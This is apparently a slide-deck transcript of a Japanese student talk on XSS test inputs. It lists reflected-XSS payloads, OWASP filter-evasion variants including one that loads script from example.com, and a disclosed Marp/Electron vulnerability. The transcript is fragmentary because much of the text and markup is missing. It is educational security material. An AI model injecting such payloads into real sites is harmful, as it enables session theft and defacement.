Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSの入力値を調べてみた / searching xss insertion value

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

Other Decks in Technology

Transcript

  1. XSS

    View Slide

  2. B1
    Twitter: @tmyk_kym
    : https://blog.koyama.me/
    : Network/Web/Server/Security
    : PyCon JP, Seccamp, etc

    View Slide

  3. XSS
    (Cross Site Scripting)
    HTML
    CWE-79: Improper Neutralization of Input During
    Web Page Generation ('Cross-site Scripting') (3.0)

    View Slide

  4. ...


    XSS Sample

    $_GET['mode'] hello


    XSS Sample
    hello

    View Slide

  5. ...


    XSS Sample

    $_GET['mode'] alert()


    XSS Sample
    alert()

    View Slide

  6. XSS
    Stored XSS( )
    Re ected XSS( )
    DOM Based XSS

    View Slide

  7. XSS
    == XSS

    View Slide

  8. alert(1)
    ">alert(1)
    " onmouseover="alert(1)
    x" onerror="alert(1) <- img src
    javascript:alert(1) <- a href

    View Slide

  9. XSS

    View Slide

  10. ?
    /
    .
    XSS .
    XSS .

    View Slide

  11. ?

    View Slide

  12. OWASP
    OWASP XSS
    2015
    XSS - OWASP
    https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

    View Slide

  13. ( )
    3

    View Slide

  14. [1]
    SRC="http://example.com/xss.js">

    / .
    ...
    src="http://example.com/xss.js">

    View Slide

  15. [2]
    <alert("XSS");//<
    HTML
    XSS .
    ...
    "> alert("XSS");//<

    View Slide

  16. [3]
    cript:ale
    rt('XSS')>
    ... HTML (16 ) .
    ...
    onerror="javascript:alert('XSS')">

    View Slide

  17. ( )

    View Slide

  18. ( )

    alert(String.fromCharCode(88,83,83))>

    View Slide

  19. View Slide

  20. Electron Marp
    Electron Web ...
    alert()
    alert ...( )

    View Slide

  21. ?

    View Slide

  22. JVN#21174546: Marp JavaScript
    https://jvn.jp/jp/JVN21174546/
    However, sanitizing inline script should
    consider on future.
    [Security issue] Remote script can read user local
    resource · Issue #187 · yhatt/marp


    View Slide

  23. XSS
    XSS
    alert()
    Electron

    View Slide